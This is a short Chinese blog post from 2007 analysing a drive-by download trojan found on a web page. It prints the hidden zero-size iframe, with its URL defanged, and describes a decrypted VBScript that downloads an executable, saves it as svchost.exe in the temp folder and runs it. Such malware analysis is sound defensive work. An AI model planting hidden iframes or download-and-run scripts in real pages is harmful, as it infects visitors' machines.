遭遇Trojan.DL.VBS.Agent.cex

endurer 原创
2007-03-16 第1版 

在浏览网页时,瑞星网页监控提示发现Trojan.DL.VBS.Agent.cex
检查该网页,发现包含代码:
/---
<iframe src="hxxp://www.ho***p*esoft.net/fa*n**ku*i/indqlg.htm" width="0" height="0" frameborder="no" border="0"
marginwidth="0" marginheight="0" scrolling="no"></iframe>
---/

hxxp://www.ho***p*esoft.net/fa*n**ku*i/indqlg.htm的内容是JavaScript脚本代码,功能是使用自定义函数psw()解密并输出变量HtmlStrings的值。

解密出来的变量HtmlStrings的值为VBScript脚本代码,功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 iqlg.exe,保存为 %temp%/svchost.exe,
并利用Shell.Application 对象 MircoLonge 的 ShellExecute 方法来运行。

iqlg.exe未能下载,可能已不存在。

你可能感兴趣的:(遭遇Trojan.DL.VBS.Agent.cex)